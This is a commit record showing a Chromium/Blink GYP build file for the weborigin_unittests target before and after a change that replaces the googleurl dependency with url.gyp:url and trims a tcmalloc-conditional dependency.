a004747df945f3361b53106339dab43e652fce74 | Fix dependencies for weborigin_unittests | hgl888/blink-crosswalk-efl,nwjs/blink,hgl888/blink-crosswalk-efl,XiaosongWei/blink-crosswalk,nwjs/blink,nwjs/blink,XiaosongWei/blink-crosswalk,jtg-gg/blink,smishenk/blink-crosswalk,smishenk/blink-crosswalk,modulexcite/blink,crosswalk-project/blink-crosswalk-efl,Pluto-tv/blink-crosswalk,kurli/blink-crosswalk,jtg-gg/blink,kurli/blink-crosswalk,jtg-gg/blink,kurli/blink-crosswalk,ondra-novak/blink,jtg-gg/blink,hgl888/blink-crosswalk-efl,kurli/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,nwjs/blink,jtg-gg/blink,modulexcite/blink,crosswalk-project/blink-crosswalk-efl,ondra-novak/blink,hgl888/blink-crosswalk-efl,PeterWangIntel/blink-crosswalk,Bysmyyr/blink-crosswalk,ondra-novak/blink,smishenk/blink-crosswalk,modulexcite/blink,XiaosongWei/blink-crosswalk,smishenk/blink-crosswalk,jtg-gg/blink,modulexcite/blink,ondra-novak/blink,nwjs/blink,PeterWangIntel/blink-crosswalk,jtg-gg/blink,Pluto-tv/blink-crosswalk,smishenk/blink-crosswalk,XiaosongWei/blink-crosswalk,hgl888/blink-crosswalk-efl,kurli/blink-crosswalk,jtg-gg/blink,PeterWangIntel/blink-crosswalk,XiaosongWei/blink-crosswalk,kurli/blink-crosswalk,jtg-gg/blink,modulexcite/blink,kurli/blink-crosswalk,modulexcite/blink,Bysmyyr/blink-crosswalk,PeterWangIntel/blink-crosswalk,Bysmyyr/blink-crosswalk,Bysmyyr/blink-crosswalk,modulexcite/blink,hgl888/blink-crosswalk-efl,Bysmyyr/blink-crosswalk,PeterWangIntel/blink-crosswalk,nwjs/blink,smishenk/blink-crosswalk,kurli/blink-crosswalk,modulexcite/blink,crosswalk-project/blink-crosswalk-efl,kurli/blink-crosswalk,Pluto-tv/blink-crosswalk,jtg-gg/blink,Pluto-tv/blink-crosswalk,ondra-novak/blink,nwjs/blink,ondra-novak/blink,PeterWangIntel/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,hgl888/blink-crosswalk-efl,Bysmyyr/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,nwjs/blink,PeterWangIntel/blink-crosswalk,smishenk/blink-crosswalk,ondra-novak/blink,Pluto-tv/blink-crosswalk,Bysmyyr/blink-crosswalk,ondra-novak/blink,Pluto-tv/blink-crosswalk,smishenk/blink-crosswalk,Pluto-tv/blink-crosswalk,Bysmyyr/blink-crosswalk,hgl888/blink-crosswalk-efl,XiaosongWei/blink-crosswalk,XiaosongWei/blink-crosswalk,nwjs/blink,crosswalk-project/blink-crosswalk-efl,nwjs/blink,hgl888/blink-crosswalk-efl,XiaosongWei/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,XiaosongWei/blink-crosswalk,modulexcite/blink,kurli/blink-crosswalk,ondra-novak/blink,hgl888/blink-crosswalk-efl,PeterWangIntel/blink-crosswalk,Bysmyyr/blink-crosswalk,modulexcite/blink,smishenk/blink-crosswalk,Pluto-tv/blink-crosswalk,Pluto-tv/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,PeterWangIntel/blink-crosswalk,Pluto-tv/blink-crosswalk,PeterWangIntel/blink-crosswalk,XiaosongWei/blink-crosswalk,smishenk/blink-crosswalk,Bysmyyr/blink-crosswalk | Source/weborigin/weborigin_tests.gyp | Source/weborigin/weborigin_tests.gyp | #
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
{
'includes': [
'../WebKit/chromium/WinPrecompile.gypi',
'weborigin.gypi',
],
'targets': [{
'target_name': 'weborigin_unittests',
'type': 'executable',
'dependencies': [
'weborigin.gyp:weborigin',
'../wtf/wtf.gyp:wtf',
'../wtf/wtf_tests.gyp:run_all_tests',
'../config.gyp:unittest_config',
'<(DEPTH)/build/temp_gyp/googleurl.gyp:googleurl',
],
'sources': [
'<@(weborigin_test_files)',
],
'conditions': [
['os_posix==1 and OS!="mac" and OS!="android" and OS!="ios" and linux_use_tcmalloc==1', {
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
]
}]
]
}],
}
| #
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
{
'includes': [
'../WebKit/chromium/WinPrecompile.gypi',
'weborigin.gypi',
],
'targets': [{
'target_name': 'weborigin_unittests',
'type': 'executable',
'dependencies': [
'weborigin.gyp:weborigin',
'../wtf/wtf.gyp:wtf',
'../wtf/wtf_tests.gyp:run_all_tests',
'../config.gyp:unittest_config',
'<(DEPTH)/url/url.gyp:url',
],
'sources': [
'<@(weborigin_test_files)',
],
'conditions': [
['os_posix==1 and OS!="mac" and OS!="android" and OS!="ios" and linux_use_tcmalloc==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
]
}]
]
}],
}
| bsd-3-clause | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.